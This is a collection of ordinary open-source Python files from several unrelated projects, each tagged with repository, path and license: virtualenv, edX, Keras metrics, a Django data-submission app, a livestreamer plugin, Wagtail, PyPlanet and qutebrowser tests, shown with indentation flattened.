cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = read_data(file, endian, 6)
# 64-bits header has one more field.
if bits == 64:
read_data(file, endian)
# The header is followed by ncmds commands
for n in range(ncmds):
where = file.tell()
# Read command header
cmd, cmdsize = read_data(file, endian, 2)
if cmd == LC_LOAD_DYLIB:
# The first data field in LC_LOAD_DYLIB commands is the
# offset of the name, starting from the beginning of the
# command.
name_offset = read_data(file, endian)
file.seek(where + name_offset, os.SEEK_SET)
# Read the NUL terminated string
load = file.read(cmdsize - name_offset).decode()
load = load[:load.index('\0')]
# If the string is what is being replaced, overwrite it.
if load == what:
file.seek(where + name_offset, os.SEEK_SET)
file.write(value.encode() + '\0'.encode())
# Seek to the next command
file.seek(where + cmdsize, os.SEEK_SET)
def do_file(file, offset=0, size=maxint):
file = fileview(file, offset, size)
# Read magic number
magic = read_data(file, BIG_ENDIAN)
if magic == FAT_MAGIC:
# Fat binaries contain nfat_arch Mach-O binaries
nfat_arch = read_data(file, BIG_ENDIAN)
for n in range(nfat_arch):
# Read arch header
cputype, cpusubtype, offset, size, align = read_data(file, BIG_ENDIAN, 5)
do_file(file, offset, size)
elif magic == MH_MAGIC:
do_macho(file, 32, BIG_ENDIAN)
elif magic == MH_CIGAM:
do_macho(file, 32, LITTLE_ENDIAN)
elif magic == MH_MAGIC_64:
do_macho(file, 64, BIG_ENDIAN)
elif magic == MH_CIGAM_64:
do_macho(file, 64, LITTLE_ENDIAN)
assert(len(what) >= len(value))
do_file(open(path, 'r+b'))
if __name__ == '__main__':
main()
## TODO:
## Copy python.exe.manifest
## Monkeypatch distutils.sysconfig
| yougov/yg-buildpack-python2-gulp | vendor/virtualenv-13.1.2/virtualenv.py | Python | mit | 99,421 |
"""Login and Registration pages (2)"""
from bok_choy.page_object import unguarded
from .login_and_register import CombinedLoginAndRegisterPage as EdXCombinedLoginAndRegisterPage
class CombinedLoginAndRegisterPage(EdXCombinedLoginAndRegisterPage):
"""
Interact with combined login and registration page.
"""
def __init__(self, browser, start_page="register", course_id=None):
"""
Initialize the page.
"""
super(CombinedLoginAndRegisterPage, self).__init__(browser, start_page, course_id)
@unguarded
def register_complete_message(self):
"""Get the message displayed to the user on the login form"""
if self.q(css=".activate-account-notice h4").visible:
return self.q(css=".activate-account-notice h4").text[0]
| nttks/edx-platform | common/test/acceptance/pages/lms/ga_login_and_register.py | Python | agpl-3.0 | 797 |
from functools import partial
from keras import backend as K
def dice_coefficient(y_true, y_pred, smooth=1.):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def dice_coefficient_loss(y_true, y_pred):
return -dice_coefficient(y_true, y_pred)
def weighted_dice_coefficient(y_true, y_pred, axis=(-3, -2, -1), smooth=0.00001):
"""
Weighted dice coefficient. Default axis assumes a "channels first" data structure
:param smooth:
:param y_true:
:param y_pred:
:param axis:
:return:
"""
return K.mean(2. * (K.sum(y_true * y_pred,
axis=axis) + smooth/2)/(K.sum(y_true,
axis=axis) + K.sum(y_pred,
axis=axis) + smooth))
def weighted_dice_coefficient_loss(y_true, y_pred):
return -weighted_dice_coefficient(y_true, y_pred)
def label_wise_dice_coefficient(y_true, y_pred, label_index):
return dice_coefficient(y_true[:, label_index], y_pred[:, label_index])
def get_label_dice_coefficient_function(label_index):
f = partial(label_wise_dice_coefficient, label_index=label_index)
f.__setattr__('__name__', 'label_{0}_dice_coef'.format(label_index))
return f
dice_coef = dice_coefficient
dice_coef_loss = dice_coefficient_loss
| ellisdg/3DUnetCNN | legacy/unet3dlegacy/metrics.py | Python | mit | 1,508 |
import uuid
import settings
import email
import logging
import string
import hashlib
import sys
import os
import traceback
from django.utils import simplejson
from random import choice
from datetime import datetime
from django.db import models
from django.db.models.signals import post_save
from django.utils.translation import ugettext_lazy as _
from django.core import serializers
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from hq.models import *
from domain.models import Domain
from hq.utils import build_url
_XFORM_URI = 'xform'
_DUPLICATE_ATTACHMENT = "duplicate_attachment"
_RECEIVER = "receiver"
class Submission(models.Model):
'''A Submission object. Represents an instance of someone POST-ing something
to our site.'''
submit_time = models.DateTimeField(_('Submission Time'), default = datetime.utcnow)
transaction_uuid = models.CharField(_('Submission Transaction ID'), max_length=36, default=uuid.uuid1())
domain = models.ForeignKey(Domain, null=True)
submit_ip = models.IPAddressField(_('Submitting IP Address'))
checksum = models.CharField(_('Content MD5 Checksum'),max_length=32)
bytes_received = models.IntegerField(_('Bytes Received'))
content_type = models.CharField(_('Content Type'), max_length=100)
raw_header = models.TextField(_('Raw Header'))
raw_post = models.FilePathField(_('Raw Request Blob File Location'), match='.*\.postdata$', path=settings.RAPIDSMS_APPS['receiver']['xform_submission_path'], max_length=255, null=True)
authenticated_to = models.ForeignKey(User, null=True)
class Meta:
get_latest_by = 'submit_time'
@property
def num_attachments(self):
return Attachment.objects.all().filter(submission=self).count()
@property
def xform(self):
'''Returns the xform associated with this, defined by being the
first attachment that has a content type of text/xml. If no such
attachments are found this will return nothing.
'''
attachments = self.attachments.order_by("id")
for attachment in attachments:
# we use the uri because the content_type can be either 'text/xml'
# (if coming from a phone) or 'multipart/form-data'
# (if coming from a webui)
if attachment.attachment_uri == _XFORM_URI:
return attachment
return None
class Meta:
ordering = ('-submit_time',)
verbose_name = _("Submission Log")
get_latest_by = "submit_time"
def __unicode__(self):
return "Submission " + unicode(self.submit_time)
def delete(self, **kwargs):
if self.raw_post is not None and os.path.exists(self.raw_post) and os.path.isfile(self.raw_post):
os.remove(self.raw_post)
else:
logging.warn("Raw post not found on file system.")
attaches = Attachment.objects.all().filter(submission = self)
if len(attaches) > 0:
for attach in attaches:
attach.delete()
super(Submission, self).delete()
def handled(self, handle_type, message=""):
"""Mark the submission as being handled in the way that is passed in.
Returns the SubmissionHandlingOccurrence that is created."""
return SubmissionHandlingOccurrence.objects.create(submission=self,
handled=handle_type,
message=message)
def unhandled(self, handle_type):
""" Deletes the 'handled' reference (used when data is deleted) """
try:
SubmissionHandlingOccurrence.objects.get(submission=self, \
handled=handle_type).delete()
except SubmissionHandlingOccurrence.DoesNotExist:
return
def is_orphaned(self):
"""Whether the submission is orphaned or not. Orphanage is defined
by having no information about the submission being handled. This
explicitly should never include something that's a duplicate, since
all dupes are explicitly logged as handled by this app.
"""
# this property will be horribly inaccurate until we clear and resubmit everything
# in our already-deployed servers
return len(SubmissionHandlingOccurrence.objects.filter(submission=self)) == 0
def is_deleted(self):
'''Whether this has has been explicitly marked as deleted
in any handling app.
'''
all_delete_types = SubmissionHandlingType.objects.filter(method="deleted")
return len(self.ways_handled.filter(handled__in=all_delete_types)) > 0
def is_duplicate(self):
"""Whether the submission is a duplicate or not. Duplicates
mean that at least one attachment from the submission was
the exact same (defined by having the same md5) as a previously
seen attachment."""
# TODO: There's two ways to do this: one relies on the post_save event to
# populate the handlers correctly. The other would just call is_duplicate
# on all the attachments. I think either one would be fine, but since
# one will work pre-migration while one will only work post migration
# I'm TEMPORARILY going with the one that walks the attachments.
# This is miserably slow (doing a full table scan for every submit) so
# should really move as soon as we migrate.
# Correct implementation commented out until migration
#for handled in SubmissionHandlingOccurrence.objects.filter(submission=self):
# if handled.handled.method == _DUPLICATE_ATTACHMENT:
# return True
#return False
for attach in self.attachments.all():
if attach.is_duplicate():
return True
return False
def export(self):
""" walks through the submission and bundles it
in an exportable format with the original submitting IP
and time, as well as a reference to the original post
"""
#print "processing %s (%s)" % (self,self.raw_post)
if self.raw_post is None:
raise Submission.DoesNotExist("Submission (%s) has empty raw_post" % self.pk)
if not os.path.exists(self.raw_post):
raise Submission.DoesNotExist("%s could not be found" % self.raw_post)
post_file = open(self.raw_post, "r")
submit_time = str(self.submit_time)
# first line is content type
content_type = post_file.readline().split(":")[1].strip()
# second line is content length
content_length = post_file.readline().split(":")[1].strip()
# third line is empty
post_file.readline()
# the rest is the actual body of the post
headers = { "content-type" : content_type,
"content-length" : content_length,
"time-received" : str(self.submit_time),
"original-ip" : str(self.submit_ip),
"domain" : self.domain.name
}
# the format will be:
# {headers} (dict)
# (empty line)
# <body>
return simplejson.dumps(headers) + "\n\n" + post_file.read()
#dmyung 11/5/2009 - removing signal and refactor attachment processing to the submit processor
#post_save.connect(process_attachments, sender=Submission)
class Attachment(models.Model):
'''An Attachment object, which is part of a submission. Many submissions
will only have one attachment, but multipart submissions will be broken
into their individual attachments.'''
submission = models.ForeignKey(Submission, related_name="attachments")
attachment_content_type = models.CharField(_('Attachment Content-Type'),max_length=64)
attachment_uri = models.CharField(_('File attachment URI'),max_length=255)
filepath = models.FilePathField(_('Attachment File'),match='.*\.attach$',path=settings.RAPIDSMS_APPS['receiver']['xform_submission_path'],max_length=255)
filesize = models.IntegerField(_('Attachment filesize'))
checksum = models.CharField(_('Attachment MD5 Checksum'),max_length=32)
def handled(self, handle_type, message=""):
""" For now, handling any attachment is equivalent to handling the
submission instance. We can imagine changing this at some future date
to use some other sort of heuristic for when a submission is 'handled'.
"""
return self.submission.handled(handle_type, message)
def unhandled(self, handle_type):
""" Deletes the 'handled' reference for this attachment's submission"""
self.submission.unhandled(handle_type)
def is_xform(self):
return self.attachment_uri == _XFORM_URI
def get_media_url(self):
basename = os.path.basename(self.filepath)
return settings.MEDIA_URL + "attachment/" + basename
def get_contents(self):
"""Get the contents for an attachment object, by reading (fully) the
underlying file."""
fin = None
try:
fin = open(self.filepath ,'r')
return fin.read()
except Exception, e:
logging.error("Unable to open attachment %s. %s" % (self, e.message),
extra={"exception": e})
finally:
if fin: fin.close()
def delete(self, **kwargs):
try:
# if for some reason deleting the file fails,
# we should still continue deleting the data model
os.remove(self.filepath)
except Exception, e:
logging.warn(str(e))
super(Attachment, self).delete()
def has_duplicate(self):
'''
Checks if this has any duplicate submissions,
defined by having the same checksum, but a different
id.
'''
return len(Attachment.objects.filter(checksum=self.checksum).exclude(id=self.id)) != 0
def is_duplicate(self):
'''
Checks if this is a duplicate submission,
defined by having other submissions with
the same checksum, but a different id, and
NOT being the first one
'''
all_matching_checksum = Attachment.objects.filter(checksum=self.checksum)
if len(all_matching_checksum) <= 1:
return False
all_matching_checksum = all_matching_checksum.order_by("submission__submit_time").order_by("id")
return self.id != all_matching_checksum.order_by("submission__submit_time").order_by("id")[0].id
def has_linked_schema(self):
'''
Returns whether this submission has a linked schema, defined
by having something in the xform manager that knows about this.
'''
# this method, and the one below are semi-dependant on the
# xformmanager app. if that app is not running, this will
# never be true but will still resolve.
if self.get_linked_metadata():
return True
return False
def get_linked_metadata(self):
'''
Returns the linked metadata for the form, if it exists, otherwise
returns nothing.
'''
if hasattr(self, "form_metadata"):
try:
return self.form_metadata.get()
except:
return None
return None
def most_recent_annotation(self):
"""Get the most recent annotation of this attachment, if it exists"""
if (self.annotations.count() > 0):
return self.annotations.order_by("-date")[0]
class Meta:
ordering = ('-submission',)
verbose_name = _("Submission Attachment")
def __unicode__(self):
return "%s : %s" % (self.id, self.attachment_uri)
def display_string(self):
return """\tDomain: %s
\tAttachment: %s
\tSubmission: %s
\tSubmit Time: %s
\tContent Type: %s
\tURI: %s
\tURL to view on server: %s
""" % \
(self.submission.domain, self.id, self.submission.id,
self.submission.submit_time, self.attachment_content_type,
self.attachment_uri,
build_url(reverse('single_submission', args=(self.submission.id,))))
class Annotation(models.Model):
"""Annotate attachments."""
# NOTE: we could make these total generic with django content-types, but
# I think it will be easier to only annotate attachments.
attachment = models.ForeignKey(Attachment, related_name="annotations")
date = models.DateTimeField(default = datetime.utcnow)
text = models.CharField(max_length=255)
user = models.ForeignKey(User)
# eventually link to an outgoing sms message on the annotation.
#sms_message = models.ForeignKey(OutgoingMessage, related_name="annotations",
# null=True, blank=True)
# for threading these, for now this is unused
parent = models.ForeignKey("self", related_name="children", null=True, blank=True)
def __unicode__(self):
return '"%s" by %s on %s' % (self.text, self.user, self.date.date())
def to_html(self):
return '<div class="annotation"><div class="annotation-date">%s</div><div class="annotation-body">%s</div></div>' %\
(self.date.date(), self.text)
class SubmissionHandlingType(models.Model):
'''A way in which a submission can be handled. Contains a reference
to both an app, that did the handling, and a method, representing
how the app did something. For example, one app could be "xformmanager"
and a way of handling could be "saved_form_data".
If app.methodname is a valid python method, receiver will attempt
to call it with the handling occurrence and a dictionary of additional
parameters as the arguments, and if
the method returns an HttpResponse object that will override
the default response. See __init__.py in this module for an example.
'''
# todo? these model names are pretty long-winded
app = models.CharField(max_length=50)
method = models.CharField(max_length=100)
def __unicode__(self):
return "%s: %s" % (self.app, self.method)
class SubmissionHandlingOccurrence(models.Model):
"""A class linking submissions to ways of handling them. Other apps
should create instances of this model by calling submission.handled()
with the appropriate handling type as submissions are processed.
An app creating an instance of this implies that the app somehow
'understood' the submission, so unparsed or error-full submisssions
should not have instances of this."""
# todo? these model names are pretty long-winded
submission = models.ForeignKey(Submission, related_name="ways_handled")
handled = models.ForeignKey(SubmissionHandlingType)
# message allows any handler to add a short message that
# the receiver app will display to the user
message = models.CharField(max_length=100, null=True, blank=True)
def log_duplicates(sender, instance, created, **kwargs): #get sender, instance, created
'''A django post-save event that logs duplicate submissions to the
handling log.'''
# only log dupes on newly created attachments, not all of them
if not created:
return
if instance.is_duplicate():
try:
error = "Got a duplicate attachment: %s." %\
(instance.display_string())
logging.error(error)
# also mark that we've handled this as a duplicate.
try:
handle_type = SubmissionHandlingType.objects.get(app=_RECEIVER, method=_DUPLICATE_ATTACHMENT)
except SubmissionHandlingType.DoesNotExist:
handle_type = SubmissionHandlingType.objects.create(app=_RECEIVER, method=_DUPLICATE_ATTACHMENT)
instance.submission.handled(handle_type)
except Exception, e:
logging.error("Problem logging a duplicate attachment: %s. The error is: %s" %\
(instance.display_string(), e))
# Register to receive signals on every attachment save.
post_save.connect(log_duplicates, sender=Attachment)
| icomms/wqmanager | apps/receiver/models.py | Python | bsd-3-clause | 16,638 |
"""Plugin for NPO: Nederlandse Publieke Omroep
Supports:
VODs: http://www.npo.nl/het-zandkasteel/POMS_S_NTR_059963
Live: http://www.npo.nl/live/nederland-1
"""
import re
import json
from livestreamer.compat import quote
from livestreamer.plugin import Plugin
from livestreamer.plugin.api import http
from livestreamer.stream import HTTPStream, HLSStream
_url_re = re.compile("http(s)?://(\w+\.)?npo.nl/")
HTTP_HEADERS = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.9 Safari/537.36"
}
class NPO(Plugin):
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url)
def get_token(self):
url = 'http://ida.omroep.nl/npoplayer/i.js?s={}'.format(quote(self.url))
token = http.get(url, headers=HTTP_HEADERS).content
token = re.compile('token.*?"(.*?)"', re.DOTALL + re.IGNORECASE).search(token).group(1)
# Great the have a ['en','ok','t'].reverse() decurity option in npoplayer.js
secured = list(token)
token = list(token)
first = -1
second = -1
for i, c in enumerate(token):
if c.isdigit() and 4 < i < len(token):
if first == -1:
first = i
else:
second = i
break
if first == -1:
first = 12
if second == -1:
second = 13
secured[first] = token[second]
secured[second] = token[first]
return ''.join(secured)
def _get_meta(self):
html = http.get('http://www.npo.nl/live/{}'.format(self.npo_id), headers=HTTP_HEADERS).content
program_id = re.compile('data-prid="(.*?)"', re.DOTALL + re.IGNORECASE).search(html).group(1)
meta = http.get('http://e.omroep.nl/metadata/{}'.format(program_id), headers=HTTP_HEADERS).content
meta = re.compile('({.*})', re.DOTALL + re.IGNORECASE).search(meta).group(1)
return json.loads(meta)
def _get_vod_streams(self):
url = 'http://ida.omroep.nl/odi/?prid={}&puboptions=adaptive,h264_bb,h264_sb,h264_std&adaptive=no&part=1&token={}'\
.format(quote(self.npo_id), quote(self.get_token()))
res = http.get(url, headers=HTTP_HEADERS);
data = res.json()
streams = {}
stream = http.get(data['streams'][0].replace('jsonp', 'json'), headers=HTTP_HEADERS).json()
streams['best'] = streams['high'] = HTTPStream(self.session, stream['url'])
return streams
def _get_live_streams(self):
meta = self._get_meta()
stream = filter(lambda x: x['type'] == 'hls', meta['streams'])[0]['url']
url = 'http://ida.omroep.nl/aapi/?type=jsonp&stream={}&token={}'.format(stream, self.get_token())
streamdata = http.get(url, headers=HTTP_HEADERS).json()
deeplink = http.get(streamdata['stream'], headers=HTTP_HEADERS).content
deeplink = re.compile('"(.*?)"', re.DOTALL + re.IGNORECASE).search(deeplink).group(1)
playlist_url = deeplink.replace("\\/", "/")
return HLSStream.parse_variant_playlist(self.session, playlist_url)
def _get_streams(self):
urlparts = self.url.split('/')
self.npo_id = urlparts[-1]
if (urlparts[-2] == 'live'):
return self._get_live_streams()
else:
return self._get_vod_streams()
__plugin__ = NPO
| charmander/livestreamer | src/livestreamer/plugins/npo.py | Python | bsd-2-clause | 3,412 |
from django.utils.functional import cached_property
from django.utils.html import escape
from wagtail.core.models import Page
from wagtail.core.rich_text import features as feature_registry
from wagtail.core.rich_text.rewriters import EmbedRewriter, LinkRewriter, MultiRuleRewriter
from wagtail.core.whitelist import Whitelister, allow_without_attributes
class WhitelistRule:
def __init__(self, element, handler):
self.element = element
self.handler = handler
class EmbedTypeRule:
def __init__(self, embed_type, handler):
self.embed_type = embed_type
self.handler = handler
class LinkTypeRule:
def __init__(self, link_type, handler):
self.link_type = link_type
self.handler = handler
# Whitelist rules which are always active regardless of the rich text features that are enabled
BASE_WHITELIST_RULES = {
'[document]': allow_without_attributes,
'p': allow_without_attributes,
'div': allow_without_attributes,
'br': allow_without_attributes,
}
class DbWhitelister(Whitelister):
"""
A custom whitelisting engine to convert the HTML as returned by the rich text editor
into the pseudo-HTML format stored in the database (in which images, documents and other
linked objects are identified by ID rather than URL):
* accepts a list of WhitelistRules to extend the initial set in BASE_WHITELIST_RULES;
* replaces any element with a 'data-embedtype' attribute with an <embed> element, with
attributes supplied by the handler for that type as defined in embed_handlers;
* rewrites the attributes of any <a> element with a 'data-linktype' attribute, as
determined by the handler for that type defined in link_handlers, while keeping the
element content intact.
"""
def __init__(self, converter_rules):
self.converter_rules = converter_rules
self.element_rules = BASE_WHITELIST_RULES.copy()
for rule in self.converter_rules:
if isinstance(rule, WhitelistRule):
self.element_rules[rule.element] = rule.handler
@cached_property
def embed_handlers(self):
return {
rule.embed_type: rule.handler for rule in self.converter_rules
if isinstance(rule, EmbedTypeRule)
}
@cached_property
def link_handlers(self):
return {
rule.link_type: rule.handler for rule in self.converter_rules
if isinstance(rule, LinkTypeRule)
}
def clean_tag_node(self, doc, tag):
if 'data-embedtype' in tag.attrs:
embed_type = tag['data-embedtype']
# fetch the appropriate embed handler for this embedtype
try:
embed_handler = self.embed_handlers[embed_type]
except KeyError:
# discard embeds with unrecognised embedtypes
tag.decompose()
return
embed_attrs = embed_handler.get_db_attributes(tag)
embed_attrs['embedtype'] = embed_type
embed_tag = doc.new_tag('embed', **embed_attrs)
embed_tag.can_be_empty_element = True
tag.replace_with(embed_tag)
elif tag.name == 'a' and 'data-linktype' in tag.attrs:
# first, whitelist the contents of this tag
for child in tag.contents:
self.clean_node(doc, child)
link_type = tag['data-linktype']
try:
link_handler = self.link_handlers[link_type]
except KeyError:
# discard links with unrecognised linktypes
tag.unwrap()
return
link_attrs = link_handler.get_db_attributes(tag)
link_attrs['linktype'] = link_type
tag.attrs.clear()
tag.attrs.update(**link_attrs)
else:
if tag.name == 'div':
tag.name = 'p'
super(DbWhitelister, self).clean_tag_node(doc, tag)
class EditorHTMLConverter:
def __init__(self, features=None):
if features is None:
features = feature_registry.get_default_features()
self.converter_rules = []
for feature in features:
rule = feature_registry.get_converter_rule('editorhtml', feature)
if rule is not None:
# rule should be a list of WhitelistRule() instances - append this to
# the master converter_rules list
self.converter_rules.extend(rule)
@cached_property
def whitelister(self):
return DbWhitelister(self.converter_rules)
def to_database_format(self, html):
return self.whitelister.clean(html)
@cached_property
def html_rewriter(self):
embed_rules = {}
link_rules = {}
for rule in self.converter_rules:
if isinstance(rule, EmbedTypeRule):
embed_rules[rule.embed_type] = rule.handler.expand_db_attributes
elif isinstance(rule, LinkTypeRule):
link_rules[rule.link_type] = rule.handler.expand_db_attributes
return MultiRuleRewriter([
LinkRewriter(link_rules), EmbedRewriter(embed_rules)
])
def from_database_format(self, html):
return self.html_rewriter(html)
class PageLinkHandler:
"""
PageLinkHandler will be invoked whenever we encounter an <a> element in HTML content
with an attribute of data-linktype="page". The resulting element in the database
representation will be:
<a linktype="page" id="42">hello world</a>
"""
@staticmethod
def get_db_attributes(tag):
"""
Given an <a> tag that we've identified as a page link embed (because it has a
data-linktype="page" attribute), return a dict of the attributes we should
have on the resulting <a linktype="page"> element.
"""
return {'id': tag['data-id']}
@staticmethod
def expand_db_attributes(attrs):
try:
page = Page.objects.get(id=attrs['id'])
attrs = 'data-linktype="page" data-id="%d" ' % page.id
parent_page = page.get_parent()
if parent_page:
attrs += 'data-parent-id="%d" ' % parent_page.id
return '<a %shref="%s">' % (attrs, escape(page.specific.url))
except Page.DoesNotExist:
return "<a>"
| nealtodd/wagtail | wagtail/admin/rich_text/converters/editor_html.py | Python | bsd-3-clause | 6,370 |
import asyncio
from inspect import iscoroutinefunction
from pyplanet.contrib.command.params import ParameterParser
class Command:
"""
The command instance describes the command itself, the target to fire and all other related information, like
admin command or aliases.
Some examples of some commands:
.. code-block:: python
# Admin command with permission on it.
Command(command='reboot', target=self.reboot_pool, perms='admin:reboot', admin=True)
# Normal user command with optional argument.
Command(command='list', target=self.show_map_list)\
.add_param(name='search', required=False)
"""
def __init__(
self, command, target, aliases=None, admin=False, namespace=None, parser=None, perms=None, description=None
):
"""
Initiate a command.
:param command: Command text (prefix without parameters).
:param target: Target method to fire.
:param aliases: Alias(ses) for the command.
:param admin: Register command in admin context.
:param namespace: Custom namespace, this can be used to create commands like '/prog start' and '/prog end'
where 'prog' is the namespace.
:param perms: Required parameters, default everyone is allowed.
:param parser: Custom parser.
:param description: Description of the command.
:type command: str
:type target: any
:type aliases: str[]
:type admin: bool
:type namespace: str, str[]
:type perms: list,str
:type parser: any
:type description: str
"""
self.command = command
self.target = target
self.aliases = aliases or list()
self.admin = admin
self.namespace = namespace
if isinstance(perms, str):
perms = [perms]
self.perms = perms
self.parser = parser or \
ParameterParser('{} {}'.format(self.namespace, self.command) if self.namespace else self.command)
self.description = description
def match(self, raw):
"""
Try to match the command with the given input in array style (splitted by spaces).
:param raw: Raw input, split by spaces.
:type raw: list
:return: Boolean if command matches.
"""
input = raw[:]
if len(input) == 0 or (len(input) == 1 and input[0] == ''):
return False
if self.admin:
if input[0][0:1] == '/':
input[0] = input[0][1:]
elif input[0] == 'admin':
input.pop(0)
else:
return False
# Make sure namespace is always an array if provided.
if self.namespace and not isinstance(self.namespace, (list, tuple)):
self.namespace = [self.namespace]
# Check against namespace.
if len(input) > 0 and self.namespace and any(input[0] == n for n in self.namespace):
input.pop(0)
elif self.namespace:
return False
if not len(input):
return False
command = input.pop(0)
if self.command == command or command in self.aliases:
return True
return False
def get_params(self, input):
"""
Get params in array from input in array.
:param input: Array of raw input.
:type input: list
:return: Array of parameters, stripped of the command name and namespace, if defined.
:rtype: list
"""
if self.admin:
if input[0][0:1] == '/':
input[0] = input[0][1:]
elif input[0] == 'admin':
input.pop(0)
if self.namespace:
input.pop(0)
input.pop(0)
return input
def add_param(
self, name: str,
nargs=1,
type=str,
default=None,
required: bool=True,
help: str=None,
dest: str=None,
):
"""
Add positional parameter.
:param name: Name of parameter, will be used to store result into!
:param nargs: Number of arguments, use integer or '*' for multiple or infinite.
:param type: Type of value, keep str to match all types. Use any other to try to parse to the type.
:param default: Default value when no value is given.
:param required: Set the parameter required state, defaults to true.
:param help: Help text to display when parameter is invalid or not given and required.
:param dest: Destination to save into namespace result (defaults to name).
:return: parser instance
:rtype: pyplanet.contrib.command.command.Command
"""
self.parser.add_param(
name=name, nargs=nargs, type=type, default=default, required=required, help=help, dest=dest
)
return self
async def handle(self, instance, player, argv):
"""
Handle command parsing and execution.
:param player: Player object.
:param argv: Arguments in array
:type player: pyplanet.apps.core.maniaplanet.models.player.Player
"""
# Check permissions.
if not await self.has_permission(instance, player):
await instance.chat(
'$z$sYou are not authorized to use this command!',
player.login
)
return
# Strip off the namespace and command.
paramv = self.get_params(argv)
# Parse, validate and show errors if any.
self.parser.parse(paramv)
if not self.parser.is_valid():
await instance.gbx.multicall(
instance.chat('$z$sCommand operation got invalid arguments: {}'.format(', '.join(self.parser.errors)), player),
instance.chat('$z$s >> {}'.format(self.usage_text), player),
)
return
# We are through. Call our target!
if iscoroutinefunction(self.target):
return await self.target(player=player, data=self.parser.data, raw=argv, command=self)
return self.target(player=player, data=self.parser.data, raw=argv, command=self)
async def has_permission(self, instance, player):
"""
Checks whether the provided player has the permission to execute this command.
:param instance: Controller Instance
:type instance: pyplanet.core.instance.Instance
:param player: Player requesting execution of this command.
:type player: pyplanet.apps.core.maniaplanet.models.player.Player
:return: Whether provided player has permission to execute this command.
"""
player_has_permission = True
if self.perms and len(self.perms) > 0:
# All the given perms need to be matching!
is_allowed = await asyncio.gather(*[
instance.permission_manager.has_permission(player, perm) for perm in self.perms
])
if not all(allowed is True for allowed in is_allowed):
player_has_permission = False
return player_has_permission
@property
def usage_text(self):
"""
The usage text line for the command.
"""
text = 'Usage: /{}{}{}'.format(
'/' if self.admin else '',
self.namespace if self.namespace else '',
self.command
)
for param in self.parser.params:
text += ' {}{}:{}{}'.format(
'[' if not param['required'] else '',
param['name'],
getattr(param['type'], '__name__', 'any'),
']' if not param['required'] else '',
)
return text
@property
def params_text(self):
text = ''
param_index = 0
for param in self.parser.params:
if param_index > 0:
text += '\n'
text += '{}{}:{}{}{}'.format(
'[' if not param['required'] else '',
param['name'],
getattr(param['type'], '__name__', 'any'),
']' if not param['required'] else '',
' = {}'.format(param['help']) if param['help'] else ''
)
param_index += 1
return text
@property
def perms_text(self):
text = ''
if self.perms and len(self.perms) > 0:
perm_index = 0
for permission in self.perms:
if perm_index > 0:
text += '\n'
text += '{}'.format(permission)
perm_index += 1
return text
def __str__(self):
# Make sure namespace is always an array if provided.
if self.namespace and not isinstance(self.namespace, (list, tuple)):
self.namespace = [self.namespace]
return '/{}{}{}'.format(
'/' if self.admin else '',
'|'.join(self.namespace) if self.namespace and isinstance(self.namespace, (list, tuple)) else self.command,
' ' + self.command if self.namespace else '',
)
| PyPlanet/PyPlanet | pyplanet/contrib/command/command.py | Python | gpl-3.0 | 7,587 |
#package QCAnalysis::TagCount;
#use base 'QCAnalysis';
#use strict;
#no strict "refs";
#use IO::File;
values={}
def parse_file(*argv):
classname = argv[0]
filename = argv[1]
analysis = argv[2]
print "opening: " + filename
try:
fh=open(filename)
except IOError as err:
print "Cannot open file: ", filename
analysis.add_property("tool", "tgac_tag_count")
for line in fh:
parse_tag_sequence_count(analysis, line.strip());
for key, value in values.items():
analysis.add_valid_type(key, value)
return analysis
def parse_tag_sequence_count(analysis, to_parse):
line=to_parse.split("\t")
values[line[2]] = "multiplex_tag"
if line[0] == analysis.get_property("lane"):
# print "Adding for lane". $line[0]."\n";
analysis.add_general_value(line[2], line[3])
| TGAC/statsdb | python/TagCount.py | Python | gpl-3.0 | 797 |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2016 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Tests for qutebrowser.commands.runners."""
import pytest
from qutebrowser.commands import runners, cmdexc
class TestCommandRunner:
"""Tests for CommandRunner."""
def test_parse_all(self, cmdline_test):
"""Test parsing of commands.
See https://github.com/The-Compiler/qutebrowser/issues/615
Args:
cmdline_test: A pytest fixture which provides testcases.
"""
cr = runners.CommandRunner(0)
if cmdline_test.valid:
list(cr.parse_all(cmdline_test.cmd, aliases=False))
else:
with pytest.raises(cmdexc.NoSuchCommandError):
list(cr.parse_all(cmdline_test.cmd, aliases=False))
def test_parse_all_with_alias(self, cmdline_test, config_stub):
config_stub.data = {'aliases': {'alias_name': cmdline_test.cmd}}
cr = runners.CommandRunner(0)
if cmdline_test.valid:
assert len(list(cr.parse_all("alias_name"))) > 0
else:
with pytest.raises(cmdexc.NoSuchCommandError):
list(cr.parse_all("alias_name"))
def test_parse_empty_with_alias(self):
"""An empty command should not crash.
See https://github.com/The-Compiler/qutebrowser/issues/1690
"""
cr = runners.CommandRunner(0)
with pytest.raises(cmdexc.NoSuchCommandError):
list(cr.parse_all(''))
def test_parse_with_count(self):
"""Test parsing of commands with a count."""
cr = runners.CommandRunner(0)
result = cr.parse('20:scroll down')
assert result.cmd.name == 'scroll'
assert result.count == 20
assert result.args == ['down']
assert result.cmdline == ['scroll', 'down']
def test_partial_parsing(self):
"""Test partial parsing with a runner where it's enabled.
The same with it being disabled is tested by test_parse_all.
"""
cr = runners.CommandRunner(0, partial_match=True)
result = cr.parse('message-i')
assert result.cmd.name == 'message-info'
| halfwit/qutebrowser | tests/unit/commands/test_runners.py | Python | gpl-3.0 | 2,859 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
